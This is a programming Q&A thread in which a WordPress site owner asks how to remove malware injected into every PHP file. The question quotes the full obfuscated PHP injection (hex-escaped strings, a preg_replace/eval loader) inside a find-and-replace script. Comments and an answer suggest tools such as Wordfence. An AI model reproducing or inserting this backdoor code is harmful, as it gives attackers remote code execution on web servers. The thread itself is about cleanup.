# Find and replace a string in multiple files in whole server

Tags: php, string

My server gets malware which was inserted a bunch of lines code in every php file now I want to remove that using a script. So initially I am trying to find and replace in a single file and later I will try for all the php files.

```
<?php
  $oldMessage = "$udpyrtpnkn = \'6]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x786~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjmeplace(\"%x2f%50%x2e%52%x29%57%x65\",\"%x65%166%x61%154%x28%151%.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<-s.973:8297f:5297e:56-%x5c%x7878r.9<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z8b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257Upo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7MPT7-NBFSUT%x5c%x7860x5c%x7878<~!!%x5c%x7825s:N}#-%x5c825-*.%x5c%x7825)euhA)3of>2bd%x5c%x78825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x%x7825>%x5c%x782fh%x5c%x7825:<f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%825tzw%x5c%x782f%x5c%x7824)#%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5cqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%%x785c2b%x5c%x7825!>!2p%x57]278]225]241]334]368]322]3]36<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7c%x7825tmw!>!#]y84]275]y83]273]y76x5c%x78272qj%x5c%x78256<^#zsfv7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5tRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#c73]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%5.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78768]y7f#<!%x5c%x7825tww!825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bgj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5cppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hf27{**u%x5c%x7825-#jt0}Z;0]=]7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c]277#<%x5c%x7825t2w>#78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<]281]y43]78]y33]65]y31]55]y85]c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOx7825)!gj!|!*1?hmg%x5c$n){return chr(ord($n)-1);} @error_reporting(0); preg_r-id%x5c%x7825)uqpuft%xLDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbx5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y782]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%53]Kc]55Ld]55#*<%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUobz+sfwjidsb%x5c%x7860bj+upcotn+q.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{6%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x85:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y35c%x787f<*XAZASV<*w%%x5c%x7827,*c%x5c%x7827,*b%x5c%x7-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x7x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tu4%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x55c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1r#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x%x5c%x7825fdy)##-!#~<%75L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]8#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72x7824<!%x5c%x7825o:!>!%xsvufs!|ftmf!~<**9.-j%x%x5c%x7825yy>#]D6]281L125rN}#QwTW%x5c%x7825hIr%x5c%x785c1^FH#%x5c%x7827rfs%x5c%x78256~85c}X%x5c%x7824<!%x5c%x7820#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x525!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782fpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2pssfw)%x5c%x7825c*W%xx5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f7825bG9}:}.}-}!#*<%x5c%x77825bss-%x5c%x7825r%x5c%x7878B%c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x78<jg!)%x5c%x7825z>>2*!%x5c%x782#%x5c%x782f#M5]DgP5]D6#<%x5c%x78]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]2x5c%x7825w:!>!%x5c%x78246767~6<Cw6<5)}.;%x5c%x7860UQPMSVD!bT-%x5c%x7825bT-%x5c%x7825hW~c%x7824*!|!%x5c%x7824-%x5c%xq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfe%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x78Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x76]258]y6g]273]y76]271]y7d]252]y7svmt+fmhpph#)zbssb!-#**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78bP#-#Q#-#B#-#T#-#E#-#G#-5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x782_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x7825pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x156%x75%156%x61\"]=1; function fjfgg(x74%141%x72%164\") && (!isset($GLOBALS[\"%x6125fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]25c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452860TW~%x5c%x7824<%x5c%x78e%x5c%x773\", NULL); }%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V7;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvb!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%xo]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x7821]K78:56985:6197g:74985-rr.93e:5597f76#<%x5c%x78e%x5c%x78b%FHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5825%x5c%x787f!<X>b%x5c%x7825Z<#o64]284]364]6]234]342]58]24]31#-%x5c%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5>!%x5c%x782400~:<h%x%x5c%x7827Y%x5c%x782564]256#<!%x5c%x7825ff2!>!b0%x28%42%x66%152%x66%147%x6x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3x6d%160%x6c%157%x64%145%<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x786x5c%x7825h>#]y31]278]y3e]8]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x7x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6Rx7825=*h%x5c%x7825)m%x5cssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x58W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|824-%x5c%x7824y7%x5c%x7824-%x5c%x87fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***7860gvodujpo)##-!#~<#%x5c%x782f%x5c%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmg#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787%42%x2c%163%x74%162%x5f%163%x70%15h%x5c%x7825)sutcvt)esp>hmg%x5c-%x5c%x7825r%x5c%x785c2^-qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%0msvd}R;*msv%x5c%x782x5c%x7825h>EzH,2W%x5c%x78255c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#7825mm!>!#]y81]273]yq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)g%156%x75%156%x61\"])))) { $GLOBALS[\"%x61%7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-buc%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnbE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x2#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5cj%x5c%x7825-bubE{h%x5c%x|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860x28%141%x72%162%x61%171%x5f%155%x61%165c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%xe]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9])!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xj6<^#Y#%x5c%x785cq%x5c%x7825oj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%xf%x5c%x7827,*e%x5c%x7827,*d7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[Ax5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y7d2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%xif((function_exists(\"%x6f%142%x5f%163%%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}65c%x785c%x5c%x7825j:^<!%x5c%x7825w%x%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x78247825#%x5c%x782f#o]#%xsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssuc%x7878:!>#]y3g]61]y3f]63]y3:]68]y]88]5]48]32M3]317]445]212]445]43]321]4%x5c%x7825)}k~~~<ftmbg!o787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)f%x7825)!gj!<**2-4-bubE{>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%xufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x75tzw>!#]y76]277]y72]265]y39]274]y85]2x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78255c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x#%x5c%x782f#%x5c%x782wN;#-Ez-1H*WCw*[!%x5c%x78f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!6<%x5c%x787fw6*CW&)7gj6<827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f3tpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]5%x7827u%x5c%x7825)7fmji%x5c%x7878627;mnui}&;zepc}A;~!}%x5x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d/(.*)/epreg_replacebsupukrgnh'; $mrvphzdexz = explode(chr((205-161)),'8660,38,4858,43,7465,40,4822,36,2103,55,110,61,5905,24,7852,38,5828,27,6847,35,2874,70,8962,34,5476,23,3943,35,4777,45,5691,35,1721,47,171,55,2513,70,49,61,9608,24,9938,62,9820,34,5929,53,5395,45,373,39,3368,28,921,48,7810,42,507,21,2180,38,9632,38,1768,47,6937,62,1044,30,3009,59,9384,64,7404,61,8045,28,5781,22,4170,59,4709,68,2730,63,6564,62,9058,43,9727,45,2434,46,4128,42,6806,41,8150,58,8698,62,6173,46,6037,57,7151,21,3978,23,2158,22,4658,51,5243,47,9194,37,4229,63,9034,24,3288,22,6718,38,8073,50,7505,48,7596,58,7705,40,5982,55,1548,51,7745,24,1074,68,2081,22,9101,23,6882,30,5566,56,7553,43,3573,70,5134,49,866,26,7255,61,969,41,561,37,3534,39,6626,56,8123,27,2698,32,9231,52,6467,64,4387,49,4292,43,2480,33,4469,21,1815,43,8907,55,1212,49,8416,43,5726,35,2018,63,5499,67,5622,32,412,34,2218,42,4058,70,8796,46,686,48,3663,43,9502,21,9548,60,10051,55,10000,51,7769,41,7316,68,1652,69,9320,64,8004,41,5183,60,2583,41,2678,20,2260,63,6256,68,8250,66,762,56,4335,52,9854,23,3762,65,1858,28,3422,54,8886,21,6219,37,3396,26,9283,37,1261,66,9877,61,1010,34,1927,21,3889,54,1461,23,5761,20,1599,53,656,30,4490,54,4544,36,6756,50,6324,24,9772,48,8316,56,8595,65,7199,56,3264,24,7890,46,7384,20,4436,33,5803,25,6348,65,4030,28,1886,41,8842,44,5290,47,818,48,8208,42,1142,70,446,61,6531,33,8459,43,9124,70,6682,36,2793,37,3211,53,6120,53,2830,44,3643,20,5337,58,3476,58,1391,70,6413,54,7172,27,9523,25,3333,35,6912,25,3157,54,7654,51,3731,31,6094,26,5440,36,226,35,2624,54,7936,68,1948,40,3310,23,3857,32,4901,69,3090,67,2412,22,3706,25,1484,64,4001,29,3068,22,5855,50,892,29,5035,53,8996,38,5654,37,9670,57,1327,64,528,33,7067,47,7114,37,8560,35,598,58,4970,65,8760,36,2944,65,261,67,3827,30,8502,58,5088,33,328,45,734,28,4635,23,9448,54,4580,55,8372,44,0,49,2323,45,6999,68,1988,30,2368,44,5121,13'); $wtnsmruwng=substr($udpyrtpnkn,(48065-37959),(24-17)); if (!function_exists('rczvdpjblj')) { function rczvdpjblj($syascgyczg, $weichsdvue) { $lilckbfxmb = NULL; for($xoosaeyubj=0;$xoosaeyubj<(sizeof($syascgyczg)/2);$xoosaeyubj++) { $lilckbfxmb .= substr($weichsdvue, $syascgyczg[($xoosaeyubj*2)],$syascgyczg[($xoosaeyubj*2)+1]); } return $lilckbfxmb; };} $jmmhxfkfmg=\"\x20\57\x2a\40\x67\146\x6b\170\x62\156\x62\144\x6d\170\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x31\55\x31\67\x34\51\x29\54\x20\143\x68\162\x28\50\x33\61\x33\55\x32\62\x31\51\x29\54\x20\162\x63\172\x76\144\x70\152\x62\154\x6a\50\x24\155\x72\166\x70\150\x7a\144\x65\170\x7a\54\x24\165\x64\160\x79\162\x74\160\x6e\153\x6e\51\x29\51\x3b\40\x2f\52\x20\153\x62\154\x6e\167\x7a\161\x71\147\x6b\40\x2a\57\x20\"; $yofbztmjsc=substr($udpyrtpnkn,(68058-57945),(58-46)); $yofbztmjsc($wtnsmruwng, $jmmhxfkfmg, NULL); $yofbztmjsc=$jmmhxfkfmg; $yofbztmjsc=(449-328); $udpyrtpnkn=$yofbztmjsc-1;";

  $deletedFormat = "";

  //read the entire string
  $str=file_get_contents('wp-load.php');

  //replace something in the file string - this is a VERY simple example
  $str=str_replace("$oldMessage", "$deletedFormat", $str);

  file_put_contents('wp-load.php', $str);
?>
```

But this was giving me error can any one give suggestions how to do this and remove this malware?

Comment: Download it and use dreamweaver. Dreamweaver can search and replace in complete folders.

Comment: it's 25 GB size directory

Comment: Yikes! I honestly don't know a different method. Good luck!

Comment: can you show me that error ?

Comment: Parse error: syntax error, unexpected '' (T_ENCAPSED_AND_WHITESPACE), expecting identifier (T_STRING) or variable (T_VARIABLE) or number (T_NUM_STRING) in F:\xampp\htdocs\sites\bubbles\test.php on line 2

Comment: unix command line .. ask your hosting provider to do this if you are unsure http://lifehacker.com/5810026/quickly-find-and-replace-text-across-multiple-documents-via-the-command-line

Comment: please change line $strnew=str_replace($oldMessage,$deletedFormat,$str);

 file_put_contents('wp-load.php', $strnew); and in your comment line please remove the space between two forward slash

Comment: The error was showing in the second line

Comment: Better not use php for 25 GB.

Comment: @Venkat; i tried this on my local ...i changed some things in code and i am not getting any error. when i am replacing simple string then its working but when i put your male-ware code then it is not replacing because in male-ware string single and double quote both are in the string and str_replace cannot replace that.

Comment: Your whole Windows server is infected with malware and you want to fix it by doing search and replace in all your PHP files? Good luck, but you really should format the disk and start from scratch.

Answer (score 1):

For wordpress malware there is a plugin available.

[Wordfence](https://wordpress.org/plugins/wordfence/) is a plugin which will find malicious code in your whole wordpress site and removes it also.

May be this will help you and save you time.